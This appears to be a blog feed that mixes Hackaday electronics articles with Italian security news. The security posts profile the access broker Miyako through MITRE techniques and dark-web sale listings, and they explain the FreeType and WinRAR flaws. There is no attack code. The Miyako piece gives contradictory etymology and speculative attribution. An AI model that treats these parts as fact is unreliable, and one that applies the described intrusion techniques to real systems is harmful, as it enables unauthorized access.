For as versatile and inexpensive as switch-mode power supplies are at all kinds of different tasks, they’re not always the ideal choice for every DC-DC circuit. Although they can do almost any job in this arena, they tend to have high parts counts, higher complexity, and higher cost than some alternatives. [Jasper] set out to test some alternative linear chargers called low dropout regulators (LDOs) for small-scale charging of lithium ion capacitors against those more traditional switch-mode options.

The application here is specifically very small solar cells in outdoor applications, which are charging lithium ion capacitors instead of batteries. These capacitors have a number of benefits over batteries including a higher number of discharge-recharge cycles and a greater tolerance of temperature extremes, so they can be better off in outdoor installations like these. [Jasper]’s findings with using these generally hold that it’s a better value to install a slightly larger solar cell and use the LDO regulator rather than using a smaller cell and a more expensive switch-mode regulator. The key, though, is to size the LDO so that the voltage of the input is very close to the voltage of the output, which will minimize losses.

With unlimited time or money, good design can become less of an issue. In this case, however, saving a few percentage points in efficiency may not be worth the added cost and complexity of a slightly more efficient circuit, especially if the application will be scaled up for mass production. If switched mode really is required for some specific application, though, be sure to design one that’s not terribly noisy.

hackaday.com/2025/06/26/linear…

Questo articolo sul threat actor di tipo Initial Access Broker di nome Miyako è il primo di una serie di articoli che avranno come scopo quello di descrivere il più possibile, con fonti OSINT/CLOSINT, alcuni dei broker di accesso che svolgono un ruolo chiave nei cyber attacchi degli ultimi anni. Abbiamo già parlato di questo ruolo, nel descrivere la piramide RaaS (Ransomware as a Service).

Origine e Attribuzione

Miyako è un sofisticato threat actor, recentemente noto per attacchi informatici su infrastrutture critiche, istituzioni finanziarie e governi a livello globale. Il nome “Miyako” deriva da un termine giapponese che significa “capitale” o “città”, indicando forse che il suo obiettivo siano infrastrutture urbane e capitali. Sulla possibile origine del nome verrà fatto un breve excursus etimologico a fine articolo.

Le origini di Miyako sono incerte, ma ci sono indicazioni di legami con forum di cybercriminali dell’Asia orientale e organizzazioni governative del Far East (Korea?).

–

–

–

Caratteristiche Chiave

• Strumenti Avanzati: Miyako utilizza malware personalizzati, come “Kintsugi” (?), sfruttando vulnerabilità zero-day in piattaforme aziendali.
• Sofisticazione Operativa: Attacchi multistadio che vanno dal riconoscimento alla migrazione laterale coordinata e all’estirpazione dei dati.
• Motivazione Ibrida: Motivazioni finanziarie e spionaggio a livello di stato-nazione, con obiettivi che vanno dalle catene di approvvigionamento alle università e al governo federale.

Ciclo di Attacco

Le operazioni di Miyako iniziano con il riconoscimento, utilizzando strumenti OSINT per identificare obiettivi di alto valore e vulnerabilità. Dopo la compromissione iniziale, Miyako sfrutta vulnerabilità zero-day in VPN, firewall e applicazioni cloud. Il gruppo installa backdoor e rootkit per mantenere l’accesso prolungato, utilizzando strumenti amministrativi legittimi per mimetizzarsi nel traffico di rete normale. Miyako esegue il dumping delle credenziali e l’escalation dei privilegi per controllare i sistemi critici, esfiltrando dati sensibili.

Cyjax, azienda inglese specializzata in Cyber Threat Intelligence (CTI), geopolitica e Social Media Monitoring, cita miyako come uno degli IAB più prolifici nel suo CTI Report trimestrale relativo a fine 2024 (2024-Q4) ..

(White Paper | Initial Access Broker Market Summary Q4 – CYJAX)

“A standout moment in Q4 was when user ‘Pennywise77777’ listed 96 accesses in a single post, the highest for 2024. These accesses targeted vulnerable sectors such as healthcare, education, and government. The most prolific IABs in Q4 included miyako (14.1%), Pennywise77777 (11.5%), and Croatoan (8.1%), further emphasising the stability and continuity in the IAB ecosystem for the quarter.”

(Segue traduz.)

Nel quarto trimestre (… del 2024 …), l’utente “Pennywise77777” ha elencato 96 accessi in un unico post, il più alto del 2024. Questi accessi hanno preso di mira settori vulnerabili come la sanità, l’istruzione e il governo. Gli IAB più prolifici nel quarto trimestre sono stati miyako (14,1%), Pennywise77777 (11,5%) e Croatoan (8,1%), sottolineando ulteriormente la stabilità e la continuità dell’ecosistema IAB nel trimestre.

Alcuni scenari in cui l’attore ha operato

Iran Telecom

Miyako sostiene di aver ottenuto un accesso root non autorizzato all’infrastruttura server di Iran Telecom. Questo server ospiterebbe sistemi firewall critici, essenziali per la sicurezza della rete di telecomunicazioni. Il threat actor avrebbe messo in vendita questo accesso su un mercato del dark web, al prezzo di 400 dollari secondo ThreatMon.

Implicazioni per la sicurezza informatica iraniana

Il settore delle telecomunicazioni iraniano è strettamente controllato dal governo e da entità legate al Corpo delle Guardie Rivoluzionarie Islamiche (IRGC). Qualsiasi violazione in questo settore potrebbe avere gravi ripercussioni sulla sicurezza nazionale. La presunta vendita dell’accesso root solleva interrogativi sulla solidità delle misure di sicurezza informatica adottate da Iran Telecom.

Amministrazioni comunali USA (Febbraio 2025)

“nastya_miyako” ha affermato, su un forum del dark web, di possedere l’accesso root ai server che ospitano i firewall di diverse amministrazioni comunali statunitensi. L’accesso sarebbe stato messo in vendita a prezzi che vanno dai 300 ai 700 dollari.

Secondo il post di ThreatMon, le amministrazioni cittadine interessate includono quelle di città in Virginia, California, Michigan, Kentucky, Montana, Mississippi e New Mexico.

Ingegneria e progettazione SCADA in USA (Febbraio 2025)

DarkWebInformer.com il 28/02/2025 informa di una presunta vendita di accesso VPN a una società di ingegneria e progettazione SCADA non meglio identificata negli USA.

Il settore di business della vittima è “Ingegneria e progettazione”.

https[:]//breachforums.st/Threxx-xxxxx-xxxxx-xxxx-VPN-Access

Agenzia Viaggi europea (Febbraio 2025)

DarkWebInformer.com il 28/02/2025 informa di una presunta vendita di accesso a un’agenzia di viaggi europea non identificata. Il paese europeo non è stato specificato. Il settore di business della vittima è “Tempo libero e viaggi”.

https[:]//breachforums.st/Thread-European-Travel-xxx-xx-xxx-xxx-xxxx-Source-Code

Rivenditore di computer cinese non specificato (Febbraio 2025)

Tattiche, tecniche e procedure (TTP)

Vediamo ora quali sono le TTP usate dall’attore secondo i ricercatori di ThreatMon.com.

Accesso iniziale

Sfruttamento di applicazioni rivolte al pubblico (T1190): sfruttamento di vulnerabilità su software come GitLab (ad esempio, CVE-2024-45409 – bypass dell’autenticazione SAML)

Exploit mirato a servizi esposti come i firewall e le applicazioni aziendali.

Phishing (T1566) utilizzato per il credentials harvesting.

Esecuzione

Interprete di comandi e scripting (T1059): utilizzo di script Python per generare traffico fittizio a scopo di ricognizione e offuscamento.

Persistenza

Manipolazione dell’account (T1098): manipolazione di account utente legittimi per mantenere l’accesso.

Escalation dei privilegi

Sfruttamento per l’escalation dei privilegi (T1068): sfruttamento le configurazioni errate nei sistemi di gestione delle identità come SAML.

Evasione della difesa

File o informazioni offuscate (T1027): compressione e cifratura dei dati rubati prima dell’esfiltrazione.

Accesso alle credenziali

Forza bruta (T1110): le credenziali dell’obiettivo dell’attacco sono memorizzate in sistemi debolmente protetti come i pannelli PhpMyAdmin.

Scoperta

Scansione dei servizi di rete (T1046): esecuzione di scansioni dei servizi di rete per identificare gli endpoint sfruttabili.

Raccolta

Dati da archivi di informazioni (T1213): raccolta di dati finanziari e di dati sensibili.

Esfiltrazione

Esfiltrazione tramite servizio Web (T1567): utilizzo di piattaforme come WeChat per trasmettere i dati rubati.

Settori target di Miyak000

• Government and Public Institutions
• Healthcare
• Finance
• Energy
• Internet Service Providers (ISPs)
• Technology and Software
• E-commerce and Retail
• Manufacturing and Engineering
• Education
• Media and News

Paesi target di Miyak000

• United States (USA)
• China
• France
• Hong Kong

Attacchi più importanti

Forniamo di seguito tracce di alcuni degli attacchi più rilevanti

• FBI Subdivision (Dicembre 2024)

• USA ISP (Febbraio 2025)

• $29.5bil Revenue USA Pharmaceutical Company (Febbraio 2025)

DarkWebInformer.com il 28/02/2025 di una presunta vendita di accesso a una società farmaceutica non identificata in un pese non specificato. Il revenue della società colpita ed indicato essere di 29,5 miliardi di dollari.

Il settore di business della vittima è “Sanità e prodotti farmaceutici”

https[:]//breachforums.st/Thread-29-5-billion-xxxx-xxx-the-world

• United States Aerospace and Defense (Gennaio 2025)

• $9bil Revenue French Energy Distribution
• Indonesian Government Financial Services
• China TELECOM Data center (Gennaio 2025)

Implicazioni

Le operazioni di Miyako evidenziano tendenze preoccupanti, come la convergenza tra attività criminali e la sponsorizzazione statale. Attaccando le catene di approvvigionamento, i furti di credenziali di Miyako minacciano la stabilità dei mercati globali. La natura potenzialmente sponsorizzata dallo stato (Korea?) delle sue attività aggiunge un ulteriore livello di complessità, con attacchi che potrebbero servire da precursori a conflitti geopolitici più ampi.

Strategie di difesa contro gli IAB

Ricordiamo alcune best practice di sana igiene Cyber per una postura in azienda che sia all’insegna della prevenzione

• Aggiornamenti Software Regolari: Assicurarsi che tutti i sistemi e le applicazioni siano aggiornati per affrontare le vulnerabilità note.
• Controlli di Accesso Forti: Adottare il principio del minimo privilegio e utilizzare l’autenticazione a più fattori (MFA).
• Segmentazione/micro segmentazione della Rete: Dividere la rete in segmenti per contenere le violazioni.
• Monitoraggio Continuo e Rilevamento delle Minacce: Utilizzare strumenti avanzati per rilevare attività anomale in tempo reale, anche con approccio basato sull’analisi del comportamento degli utenti e delle entità (User Entity and Behavior Analytics, UEBA).
• Formazione e Consapevolezza dei Dipendenti: Educare i dipendenti sulle migliori pratiche di cybersecurity.
• Piani di risposta agli incidenti: Stabilire e testare regolarmente piani di risposta agli incidenti.
• Soluzioni di Backup e recupero Sicure: Implementare soluzioni di backup robuste per i dati critici.
• Servizi di Intelligence sulle minacce: Abbonarsi a servizi di intelligence per rimanere informati sulle minacce emergenti.

NotaBENE – Curiosità

MIYAK0 o MIYAK-00/MIYAK-000 è noto anche come codice di errore in device di tipo OBD (Scanner diagnostico di bordo)

Il DTC MIYAK0, a volte indicato come MIYAK000 o MIYAK00, è un codice diagnostico di guasto OBD che indica un guasto specifico del produttore con la parte sconosciuta del veicolo. (dot.report/dtc/MIYAK0)

Miyako è stato citato nell’articolo RHC “$800 per compromettere un contractor nucleare UK? Gli IaB alzano la posta in gioco!” di Luca Stivali redhotcyber.com/post/800-per-c…

L’intervista allo IAB Miyako di Osint10x è disponibile al seguente link

osint10x.com/threat-actor-inte…

Conclusione

L’emergere di attori delle minacce come Miyako sottolinea l’importanza critica di misure di cybersecurity robuste. Implementando strategie di sicurezza complete, le organizzazioni possono migliorare la loro resilienza contro avversari sofisticati e contribuire a un panorama informatico più sicuro.

Origini del termine giapponese

Il nome Miyako ha una storia ricca e affascinante che attraversa i secoli. Comprendere le origini e il significato culturale di questo nome fornisce preziose indicazioni sulla lingua e sulla società giapponese. In questo articolo approfondiremo il significato di Miyako, esploreremo il suo contesto storico, esamineremo la sua influenza geografica e analizzeremo la sua rappresentazione nella letteratura e nei media. Discuteremo anche le tendenze e le previsioni future per il nome Miyako nell’era digitale.

Capire il nome Miyako

Il nome Miyako occupa un posto speciale nella cultura giapponese. È un nome unisex che può essere dato sia a bambini che a bambine, anche se è più comunemente usato per le ragazze. Il significato di Miyako va oltre la sua traduzione letterale. Porta con sé un profondo simbolismo culturale e riflette i valori e le tradizioni del popolo giapponese.

In giapponese, Miyako si scrive con i caratteri

che significa bellezza, e

che significa notte.

Questa combinazione crea un’immagine visiva di una bella notte, evocando sentimenti di serenità, mistero e incanto. Il nome Miyako ha quindi una qualità poetica che risuona con la sensibilità estetica dei giapponesi: quando si sente il nome Miyako, si immagina un paesaggio sereno immerso nel tenue chiarore della luna. Il nome evoca un senso di tranquillità e di pace, come se il tempo si fermasse sotto la copertura dell’oscurità. È un nome che esercita un certo fascino, attirando le persone con la sua bellezza accattivante.

Il significato di Miyako

Miyako simboleggia la bellezza che si trova nella tranquillità della notte. Rappresenta un senso di calma e di pace che si può provare quando il giorno volge al termine. Il nome Miyako risuona con gli individui che apprezzano l’immobilità e la grazia che si possono trovare nell’oscurità, così come con coloro che trovano conforto nei momenti di riflessione e introspezione.

Quando qualcuno si chiama Miyako, riceve un nome che riflette le sue qualità più profonde. Possiede un’innata capacità di trovare la bellezza nelle cose più semplici e di apprezzare i momenti fugaci che la vita ha da offrire. I Miyako sono spesso considerati pensatori profondi, anime introspettive che trovano conforto nella quiete della notte.

Il significato culturale di Miyako

Miyako ha un profondo significato culturale in Giappone. È spesso associato all’estetica tradizionale giapponese, come il wabi-sabi, che celebra la bellezza dell’imperfezione e la transitorietà della vita. Il nome Miyako incarna l’idea di trovare la bellezza nella semplicità e di apprezzare i momenti fugaci dell’esistenza.

Inoltre, Miyako è un nome popolare per i luoghi in Giappone. Molte città e paesi portano il nome Miyako, a testimonianza del suo significato e del suo fascino diffuso. Queste località vantano spesso paesaggi naturali mozzafiato, giardini sereni e siti storici che incarnano l’essenza di Miyako. I visitatori di questi luoghi vengono accolti con un senso di tranquillità e di apprezzamento per la bellezza che li circonda.

Nel complesso, il nome Miyako occupa un posto speciale nella cultura giapponese. È un nome che porta con sé un significato profondo e un’importanza culturale. Sia che venga dato a una persona, sia che venga usato per dare il nome a un luogo, Miyako evoca un senso di bellezza, tranquillità e apprezzamento per i momenti di tranquillità della vita.

Il contesto storico di Miyako

La storia di Miyako è strettamente legata allo sviluppo della società giapponese. La comprensione del suo contesto storico fornisce una prospettiva più ampia sull’evoluzione del nome e sulle sue implicazioni culturali. Miyako, che significa “capitale”, ha una storia ricca e affascinante che va dall’antichità ai giorni nostri. Dalle sue origini come antica capitale del Giappone al suo uso moderno come nome caro, Miyako ha svolto un ruolo significativo nel plasmare la cultura e l’identità del paese.

Miyako durante il Medioevo

Durante il Medioevo, Miyako continuò a mantenere l’indicazione di posizione di città importante. Tuttavia, il potere politico si spostò ed emersero nuove capitali, ognuna delle quali portò il nome di Miyako a un certo punto della storia del Giappone. Queste nuove capitali hanno ereditato l’eredità culturale dei loro predecessori, contribuendo al significato attuale del nome.

Con l’affermarsi del sistema feudale, Miyako divenne un palcoscenico per i grandi clan di samurai, che si contendevano potere e influenza. Le città furono testimoni di feroci battaglie e intrighi politici, lasciando un segno indelebile nella loro storia. Il nome “Miyako” fu associato a storie di eroismo, onore e sacrificio.

Nonostante i cambiamenti politici, i luoghi di nome Miyako rimasere un centro di cultura e di espressione artistica. I templi e i santuari della città continuarono ad attrarre pellegrini e devoti, mentre i mercati erano animati da scambi e commerci. Miyako divenne un simbolo di resilienza e adattabilità, in quanto resistette alle tempeste della guerra e agli sconvolgimenti politici.

Il nome Miyako oggi

Nei media contemporanei, Miyako continua ad affascinare il pubblico: che si tratti di film, programmi televisivi o manga, il nome Miyako rappresenta spesso un personaggio che incarna grazia, intelligenza e forza interiore.

Il nome Miyako è ricco di significati culturali e storici, riassumendo e catturando l’essenza del patrimonio giapponese. Questo nome affascina attraverso il suo simbolismo e le sue rappresentazioni letterarie e mediatiche.

Fonte etimologica

Origin of the Name Miyako (Complete History)

letslearnslang.com/origin-of-t…

Bibliografica

Iranian Telecom Server Access Allegedly Sold on Dark Web

Weekly Darkweb in February W2

Miyako: An Emerging Threat Actor with Advanced Capabilities – ThreatMon

Miyako lists USA Gov Aerospace and Defense firewall access for sale

US City Governments’ Firewall Access Allegedly for Sale on Dark Web

Exclusive: FBI subdivision firewall access listed by potential Schneider Electric hacker – Cyber Daily

Miyako Claims to be Selling Access to an Unidentified SCADA Engineering & Design Firm in the USA

Miyako is Claiming to Sell Access to an Unidentified $29.5 Billion Pharmaceutical Company

DTC MIYAK0 OBD-II

White Paper | Initial Access Broker Market Summary Q4 – CYJAX

Miyako Claims to be Selling Access to an Unidentified Chinese Computer Store

L'articolo Miyako, un attore IAB emergente dal raffinato nome giapponese proviene da il blog della sicurezza informatica.

Meta ha ufficialmente confermato la connessione tra una vulnerabilità recentemente scoperta nella libreria FreeType e lo sviluppatore di spyware israeliano Paragon. La vulnerabilità in questione è il CVE-2025-27363, che colpisce una libreria molto utilizzata dagli sviluppatori per lavorare con testo e font. La vulnerabilità consente l’esecuzione di codice arbitrario sul dispositivo della vittima ed era inizialmente considerata potenzialmente sfruttabile in attacchi reali.

A marzo, Meta ha pubblicato un avviso relativo a CVE-2025-27363 sulla sua pagina Facebook dedicata agli avvisi di sicurezza. L’avviso segnalava che la vulnerabilità riguardava la libreria FreeType versione 2.13.0 e precedenti. Il problema risiede nella gestione errata delle strutture dei sottoglifi dei font TrueType GX e delle variabili dei font. Come spiegato dagli esperti, l’errore si verifica a causa dell’assegnazione di un valore short con segno a una variabile long senza segno. Successivamente, viene aggiunto un valore fisso, che causa un overflow. Il codice scrive quindi fino a sei interi long al di fuori dell’area allocata, consentendo all’attaccante di eseguire codice arbitrario.

All’inizio di maggio, la vulnerabilità è stata risolta in Android. Tuttavia, i dettagli sugli attacchi specifici che utilizzano CVE-2025-27363 non sono stati divulgati fino a poco tempo fa. Come si è appreso dai commenti dei rappresentanti di WhatsApp, è stato il team di messaggistica a richiedere l’assegnazione di un identificatore CVE per questa vulnerabilità. Il motivo è che il problema è direttamente correlato a un exploit dell’azienda israeliana Paragon.

Il gruppo di ricerca Citizen Lab dell’Università di Toronto ha precedentemente segnalato che i prodotti Paragon vengono utilizzati attivamente per attacchi spyware. A marzo, gli esperti hanno pubblicato i dati su una vulnerabilità zero-day in WhatsApp, sfruttata in attacchi con lo spyware Paragon. Secondo quanto riportato da Messenger, gli aggressori hanno utilizzato chat di gruppo e l’invio di file PDF per infettare i dispositivi. La vulnerabilità è stata quindi risolta lato server, senza la necessità di installare aggiornamenti alle applicazioni client.

Ora WhatsApp ha chiarito che la vulnerabilità CVE-2025-27363 è stata scoperta nell’ambito di una più ampia analisi di potenziali canali di infezione non direttamente correlati a WhatsApp. L’obiettivo dell’indagine è determinare in quali altri modi le aziende di spyware possano inviare codice dannoso ai dispositivi delle vittime. WhatsApp ha affermato che i risultati di questa indagine sono stati condivisi con altre aziende per migliorare il livello di protezione complessivo nel settore.

Lo spyware Graphite, è già stato rilevato in diversi paesi, tra cui Australia, Canada, Danimarca, Italia, Cipro, Singapore e Israele. Citizen Lab ha ripetutamente sottolineato l’elevata complessità tecnica degli attacchi Paragon e la presenza di exploit che non richiedono alcuna azione da parte della vittima: l’infezione avviene automaticamente. In particolare, l’azienda era già riuscita ad attaccare con successo anche le versioni attuali di iPhone, fino a quando Apple non ha risolto le relative vulnerabilità.

L'articolo Meta conferma: lo spyware Paragon ha sfruttato una falla nei font per infettare i dispositivi proviene da il blog della sicurezza informatica.

Il capo della Chiesa cattolica ha espresso preoccupazione per il modo in cui i bambini e gli adolescenti di oggi interagiscono con le tecnologie digitali. A suo avviso, l’abbondanza di informazioni disponibili attraverso reti neurali e altri sistemi intelligenti può influire seriamente sullo sviluppo mentale e intellettuale delle giovani generazioni.

Papa Leone XIV ha messo in guardia dai rischi che il rapido sviluppo dell’intelligenza artificiale potrebbe rappresentare per i giovani. Ha espresso la sua posizione alla Seconda Conferenza Annuale di Roma sull’IA, parte della quale si sta tenendo in Vaticano.

Allo stesso tempo, il Pontefice ha osservato che l’intelligenza artificiale di per sé non rappresenta una minaccia. Può essere utile se usata responsabilmente. Tuttavia, le tecnologie non dovrebbero diventare uno strumento di manipolazione, violazione dei diritti umani o provocazione di conflitti.

La valutazione dell’impatto della digitalizzazione dovrebbe basarsi non solo su criteri tecnici, ma anche su principi etici superiori. È importante mantenere il rispetto della dignità umana e della diversità culturale e ricordare che l’accesso a grandi quantità di dati non implica necessariamente il possesso di una conoscenza o di una comprensione autentiche.

La capacità di elaborare informazioni non va confusa con la capacità di pensare in modo indipendente. La vera conoscenza richiede riflessione e pensiero critico, non fiducia cieca negli algoritmi.

Ricordiamo che Leone XIV è diventato Papa nel maggio di quest’anno, in sostituzione del defunto Papa Francesco. Fin dall’inizio del suo pontificato, ha prestato particolare attenzione alle questioni della digitalizzazione e al suo impatto sulla società. Tra le priorità vi è la tutela di valori fondamentali come la dignità umana, la giustizia e i diritti dei lavoratori. Il pontefice è convinto che il progresso tecnico non possa essere disgiunto dalla responsabilità morale.

Il Papa ha rilasciato la sua dichiarazione durante i dibattiti di una conferenza sull’intelligenza artificiale che ha riunito rappresentanti della Chiesa, del mondo accademico, dell’industria e delle organizzazioni per i diritti umani. L’obiettivo principale dell’evento è trovare un equilibrio tra sviluppo tecnologico e valori umanistici.

La Santa Sede ha già sollevato la questione dell’etica nell’alta tecnologia. Il Vaticano ha costantemente chiesto di non demonizzare l’intelligenza artificiale, ma piuttosto di trovare modi per utilizzarla in modo sicuro e responsabile. Gli esperti sottolineano che la partecipazione attiva della Chiesa cattolica a tali discussioni rappresenta un passo importante verso la creazione di un dialogo globale sul futuro della tecnologia. Dopotutto, l’influenza delle macchine intelligenti oggi va ben oltre l’economia, toccando la cultura, l’istruzione e persino le questioni dell’identità umana.

Le preoccupazioni espresse sono condivise da molti insegnanti, genitori e scienziati. La domanda si fa sempre più ricorrente: come garantire lo sviluppo armonioso dei bambini nel nuovo mondo? Secondo gli osservatori, questo tema diventerà uno dei temi chiave per il nuovo capo della Chiesa cattolica nei prossimi anni.

L'articolo Il Papa avverte: “L’IA non è il diavolo, ma può diventarlo senza etica” proviene da il blog della sicurezza informatica.

L’Azienda Ospedaliera Antonio Cardarelli di Napoli ha diramato un avviso urgente alla cittadinanza, segnalando una truffa che sta circolando tramite SMS. Numerosi cittadini hanno riportato di aver ricevuto messaggi che simulano comunicazioni ufficiali dal Centro Unico di Prenotazione, inducendo allarmismo e spingendo gli utenti a contattare numeri sospetti. L’obiettivo è quello di trarre in inganno le persone sfruttando la fiducia nelle istituzioni sanitarie.

Una truffa ben orchestrata

I messaggi incriminati si presentano come avvisi urgenti legati a prestazioni sanitarie o prenotazioni, chiedendo al destinatario di contattare tempestivamente un numero per ottenere informazioni. In realtà, si tratta di numerazioni a pagamento, gestite da soggetti esterni e completamente estranee all’ospedale. Chi cade nella trappola rischia di subire addebiti economici, senza ricevere alcuna reale informazione sanitaria.

Come riconoscere i messaggi fraudolenti
L’ospedale invita i cittadini a prestare la massima attenzione: ogni comunicazione ufficiale avviene solo tramite canali istituzionali. I messaggi contenenti toni allarmistici, richieste di chiamata immediata o numerazioni anomale devono essere considerati sospetti. Il consiglio è di non rispondere, non richiamare e, soprattutto, non fornire dati personali o sanitari a sconosciuti.

Le modalità ufficiali di contatto

Per tutelarsi, è fondamentale conoscere i veri canali dell’ospedale. Il Cardarelli ha ricordato che le comunicazioni ufficiali avvengono esclusivamente attraverso i contatti autorizzati e mai tramite SMS generici o numeri a pagamento. Inoltre, il centro prenotazioni non invia mai messaggi che richiedono urgenze improvvise o azioni immediate tramite link o contatti non verificabili.

L’invito alla segnalazione

Infine, l’ospedale invita chiunque riceva questi messaggi truffaldini a segnalarli tempestivamente alle autorità competenti e al proprio operatore telefonico, contribuendo così a contrastare la diffusione del fenomeno. L’impegno del Cardarelli è volto a garantire trasparenza, sicurezza e fiducia nei confronti dei pazienti, anche attraverso una corretta informazione e sensibilizzazione digitale.

L'articolo L’Ospedale Cardarelli lancia l’allarme: attenzione alla truffa via SMS proviene da il blog della sicurezza informatica.

In theory, writing a Linux device driver shouldn’t be that hard, but it is harder than it looks. However, using libusb, you can easily deal with USB devices from user space, which, for many purposes, is fine. [Crescentrose] didn’t know anything about writing user-space USB drivers until they wrote one and documented it for us. Oh, the code is in Rust, for which there aren’t as many examples.

The device in question was a USB hub with some extra lights and gadgets. So the real issue, it seems to us, wasn’t the code, but figuring out the protocol and the USB stack. The post covers that, too, explaining configurations, interfaces, and endpoints.

There are other ancillary topics, too, like setting up udev. This lets you load things when a USB device (or something else) plugs in.

Of course, you came for the main code. The Rust program is fairly straightforward once you have the preliminaries out of the way. The libusb library helps a lot. By the end, the code kicks off some threads, handles interrupts, and does other device-driver-like things.

So if you like Rust and you ever thought about a user space device driver for a USB device, this is your chance to see it done. It didn’t take years. However, you can do a lot in user space.

hackaday.com/2025/06/26/rust-d…

It’s about time! Or maybe it’s about time’s reciprocal: frequency. Whichever way you see it, Hackaday is pleased to announce, just this very second, the 2025 One Hertz Challenge over on Hackaday.io. If you’ve got a device that does something once per second, we’ve got the contest for you. And don’t delay, because the top three winners will each receive a $150 gift certificate from this contest’s sponsor: DigiKey.

What will you do once per second? And how will you do it? Therein lies the contest! We brainstormed up a few honorable mention categories to get your creative juices flowing.

• Timelords: How precisely can you get that heartbeat? This category is for those who prefer to see a lot of zeroes after the decimal point.
• Ridiculous: This category is for the least likely thing to do once per second. Accuracy is great, but absurdity is king here. Have Rube Goldberg dreams? Now you get to live them out.
• Clockwork: It’s hard to mention time without thinking of timepieces. This category is for the clockmakers among you. If your clock ticks at a rate of one hertz, and you’re willing to show us the mechanism, you’re in.
• Could Have Used a 555: We knew you were going to say it anyway, so we made it an honorable mention category. If your One Hertz project gets its timing from the venerable triple-five, it belongs here.

We love contests with silly constraints, because you all tend to rise to the challenge. At the same time, the door is wide open to your creativity. To enter, all you have to do is document your project over on Hackaday.io and pull down the “Contests” tab to One Hertz to enter. New projects are awesome, but if you’ve got an oldie-but-goodie, you can enter it as well. (Heck, maybe use this contest as your inspiration to spruce it up a bit?)

Time waits for no one, and you have until August 19th at 9:00 AM Pacific time to get your entry in. We can’t wait to see what you come up with.

hackaday.com/2025/06/26/announ…

Here’s a fun build. Over on their YouTube channel our hacker [Atasoy] shows us how to make a custom floral keyboard keycap using resin.

We begin by using an existing keycap as a pattern to make a mold. We plug the keycap with all-purpose adhesive paste so that we can attach it to a small sheet of Plexiglas, which ensures the floor of our mold is flat. Then a side frame is fashioned from 100 micron thick acetate which is held together by sticky tape. Hot glue is used to secure the acetate side frame to the Plexiglas floor, keeping the keycap centered. RTV2 molding silicone is used to make the keycap mold. After 24 hours the silicone mold is ready.

Then we go through a similar process to make the mold for the back of the keycap. Modeling clay is pushed into the back of the keycap. Then silicone is carefully pushed into the keycap, and 24 hours later the back silicone mold is also ready.

The back mold is then glued to a fresh sheet of Plexiglas and cut to shape with a craft knife. Holes are drilled into the Plexiglas. A mix of artificial grass and UV resin is made to create the floor. Then small dried flowers are cut down to size for placement in the top of the keycap. Throughout the process UV light is used to cure the UV resin as we go along.

Finally we are ready to prepare and pour our epoxy resin, using our two molds. Once the mold sets our new keycap is cut out with a utility knife, then sanded and polished, before being plugged into its keyboard. This was a very labor intensive keycap, but it’s a beautiful result.

If you’re interested in making things with UV resin, we’ve covered that here before. Check out 3D Printering: Print Smoothing Tests With UV Resin and UV Resin Perfects 3D Print, But Not How You Think. Or if you’re interested in epoxy resin, we’ve covered that too! See Epoxy Resin Night Light Is An Amazing Ocean-Themed Build and Degassing Epoxy Resin On The (Very) Cheap.

Thanks to [George Graves] for sending us this one via the tipsline!

youtube.com/embed/07K_nX6TEoE?…

hackaday.com/2025/06/26/how-to…

Gli sviluppatori di WinRAR hanno risolto una vulnerabilità relativa all’override della directory, che ha ricevuto l’identificatore CVE-2025-6218. In determinate circostanze, questo bug permetteva l’esecuzione di malware dopo l’estrazione dell’archivio.

La vulnerabilità ha ricevuto un punteggio di 7,8 punti sulla scala CVSS ed è stata scoperta da un ricercatore con il nickname whs3-detonator, che ha segnalato il problema attraverso Zero Day Initiative all’inizio di giugno 2025. Il problema riguarda solo la versione Windows di WinRAR, a partire dalla versione 7.11 e successive, mentre la correzione è stata introdotta nella versione WinRAR 7.12 beta 1, uscita questa settimana.

“Quando si estrae un file nelle vecchie versioni di WinRAR, RAR per Windows, UnRAR e UnRAR.dll, incluso il codice sorgente UnRAR portatile, è possibile utilizzare il percorso specificato in un archivio appositamente predisposto, anziché il percorso specificato dall’utente”, spiegano gli sviluppatori.

In altre parole, un archivio dannoso può contenere file con un percorso relativo modificato, che costringe WinRAR a estrarli in posizioni potenzialmente pericolose, inclusi directory di sistema e cartelle di avvio automatico.

Se il contenuto di tale archivio è dannoso, i file estratti possono essere eseguiti automaticamente, provocando l’esecuzione di codice pericoloso al successivo accesso dell’utente a Windows. Anche se tali programmi vengono eseguiti con diritti di livello utente e non hanno privilegi di amministratore o SYSTEM, sono comunque in grado di rubare dati sensibili, inclusi cookie del browser e password salvate, stabilirsi nel sistema della vittima o fornire accesso remoto ai propri operatori.

Oltre a CVE-2025-6218, nella versione WinRAR 7.12 beta 1 è stata anche risolta una problematica di iniezione HTML, che si verificava durante la generazione di rapporti. Questo bug è stato segnalato dal ricercatore di sicurezza Marcin Bobryk (Marcin Bobryk). Egli spiega che i nomi dei file di archivio contenenti potevano essere incorporati nel rapporto HTML come tag HTML non elaborati. Di conseguenza, ciò poteva portare a iniezioni HTML e JS se i rapporti venivano aperti in un browser.

L'articolo Attenzione! WinRAR: Vulnerabilità Critica che Potrebbe Eseguire Malware proviene da il blog della sicurezza informatica.

A lot of people complain that driving across the United States is boring. Having done the coast-to-coast trip seven times now, I can’t agree. Sure, the stretches through the Corn Belt get a little monotonous, but for someone like me who wants to know how everything works, even endless agriculture is fascinating; I love me some center-pivot irrigation.

One thing that has always attracted my attention while on these long road trips is the weigh stations that pop up along the way, particularly when you transition from one state to another. Maybe it’s just getting a chance to look at something other than wheat, but weigh stations are interesting in their own right because of everything that’s going on in these massive roadside plazas. Gone are the days of a simple pull-off with a mechanical scale that was closed far more often than it was open. Today’s weigh stations are critical infrastructure installations that are bristling with sensors to provide a multi-modal insight into the state of the trucks — and drivers — plying our increasingly crowded highways.

All About the Axles

Before diving into the nuts and bolts of weigh stations, it might be helpful to discuss the rationale behind infrastructure whose main function, at least to the casual observer, seems to be making the truck driver’s job even more challenging, not to mention less profitable. We’ve all probably sped by long lines of semi trucks queued up for the scales alongside a highway, pitying the poor drivers and wondering if the whole endeavor is worth the diesel being wasted.

The answer to that question boils down to one word: axles. In the United States, the maximum legal gross vehicle weight (GVW) for a fully loaded semi truck is typically 40 tons, although permits are issued for overweight vehicles. The typical “18-wheeler” will distribute that load over five axles, which means each axle transmits 16,000 pounds of force into the pavement, assuming an even distribution of weight across the length of the vehicle. Studies conducted in the early 1960s revealed that heavier trucks caused more damage to roadways than lighter passenger vehicles, and that the increase in damage is proportional to the fourth power of axle weight. So, keeping a close eye on truck weights is critical to protecting the highways.

